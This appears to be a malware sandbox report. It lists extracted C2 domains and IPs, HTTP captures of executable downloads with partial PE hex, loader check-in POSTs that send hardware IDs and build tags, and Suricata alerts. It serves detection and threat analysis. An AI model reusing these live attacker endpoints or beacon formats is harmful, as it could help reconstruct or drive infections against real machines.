Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor IPs: 185.215.113.43
Source: unknown Network traffic detected: DNS query count 36
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:38:15 GMTContent-Type: application/octet-streamContent-Length: 2750464Last-Modified: Thu, 31 Oct 2024 23:00:11 GMTConnection: keep-aliveETag: "67240bfb-29f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 21 1f 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 69 74 6f 6b 71 65 6f 73 00 a0 29 00 00 a0 00 00 00 98 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 71 74 6e 74 68 6d 70 00 20 00 00 00 40 2a 00 00 04 00 00 00 d2 29 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2a 00 00 22 00 00 00 d6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:38:22 GMTContent-Type: application/octet-streamContent-Length: 1968128Last-Modified: Thu, 31 Oct 2024 23:36:29 GMTConnection: keep-aliveETag: "6724147d-1e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 20 4e 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 4e 00 00 04 00 00 8f dc 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 0a 4e 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 0a 4e 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 
90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2c 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6f 64 6b 73 63 63 62 00 f0 1a 00 00 20 33 00 00 ec 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 65 6f 6a 71 62 6b 7a 00 10 00 00 00 10 4e 00 00 04 00 00 00 e2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 4e 00 00 22 00 00 00 e6 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:38:43 GMTContent-Type: application/octet-streamContent-Length: 2955264Last-Modified: Thu, 31 Oct 2024 23:36:09 GMTConnection: keep-aliveETag: "67241469-2d1800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:38:53 GMTContent-Type: application/octet-streamContent-Length: 2123776Last-Modified: Thu, 31 Oct 2024 23:36:22 GMTConnection: keep-aliveETag: "67241476-206800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:02 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Thu, 31 Oct 2024 22:59:44 GMTConnection: keep-aliveETag: "67240be0-e0800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:05 GMTContent-Type: application/octet-streamContent-Length: 2750464Last-Modified: Thu, 31 Oct 2024 23:00:11 GMTConnection: keep-aliveETag: "67240bfb-29f800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:10 GMTContent-Type: application/octet-streamContent-Length: 888832Last-Modified: Sun, 27 Oct 2024 06:45:44 GMTConnection: keep-aliveETag: "671de198-d9000"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:13 GMTContent-Type: application/octet-streamContent-Length: 1968128Last-Modified: Thu, 31 Oct 2024 23:36:29 GMTConnection: keep-aliveETag: "6724147d-1e0800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:27 GMTContent-Type: application/octet-streamContent-Length: 2750464Last-Modified: Thu, 31 Oct 2024 23:00:11 GMTConnection: keep-aliveETag: "67240bfb-29f800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:37 GMTContent-Type: application/octet-streamContent-Length: 1968128Last-Modified: Thu, 31 Oct 2024 23:36:29 GMTConnection: keep-aliveETag: "6724147d-1e0800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:49 GMTContent-Type: application/octet-streamContent-Length: 2750464Last-Modified: Thu, 31 Oct 2024 23:00:11 GMTConnection: keep-aliveETag: "67240bfb-29f800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:51 GMTContent-Type: application/octet-streamContent-Length: 1968128Last-Modified: Thu, 31 Oct 2024 23:36:29 GMTConnection: keep-aliveETag: "6724147d-1e0800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 30 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003036001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 30 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003037001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHDHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 39 33 37 35 32 30 46 33 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 2d 2d 0d 0a Data Ascii: ------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="hwid"62937520F30F807656615------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="build"tale------JEBKEHJJDAAAAKECBGHD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 30 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003038001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFBFBAAKECFIEBFIECHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 39 33 37 35 32 30 46 33 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 2d 2d 0d 0a Data Ascii: ------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="hwid"62937520F30F807656615------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="build"tale------BAAFBFBAAKECFIEBFIEC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 30 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003039001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAEBGCAAECAKFHIIJDBHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 39 33 37 35 32 30 46 33 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="hwid"62937520F30F807656615------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="build"tale------IDAEBGCAAECAKFHIIJDB--
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEGHJJDGHCAKEBGIJKJHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 39 33 37 35 32 30 46 33 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------IIEGHJJDGHCAKEBGIJKJContent-Disposition: form-data; name="hwid"62937520F30F807656615------IIEGHJJDGHCAKEBGIJKJContent-Disposition: form-data; name="build"tale------IIEGHJJDGHCAKEBGIJKJ--
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKJEHDBGHIEBGCGDGHHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 39 33 37 35 32 30 46 33 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 48 2d 2d 0d 0a Data Ascii: ------CBAKJEHDBGHIEBGCGDGHContent-Disposition: form-data; name="hwid"62937520F30F807656615------CBAKJEHDBGHIEBGCGDGHContent-Disposition: form-data; name="build"tale------CBAKJEHDBGHIEBGCGDGH--
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBGCAAAAFBKEBFHJEGCFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 39 33 37 35 32 30 46 33 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 2d 2d 0d 0a Data Ascii: ------FBGCAAAAFBKEBFHJEGCFContent-Disposition: form-data; name="hwid"62937520F30F807656615------FBGCAAAAFBKEBFHJEGCFContent-Disposition: form-data; name="build"tale------FBGCAAAAFBKEBFHJEGCF--
Source: Joe Sandbox View IP Address: 185.215.113.43
Source: Joe Sandbox View IP Address: 34.149.100.209
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49717 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49729 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49735 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49887 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49939 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49948 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49949 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49958 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49967 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49978 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49989 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50000 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50004 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50007 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50008 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50009 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50006 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50011 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50012 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50012 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50015 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50020 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50028 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50033 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50037 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50039 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50074 -> 188.114.96.3:443
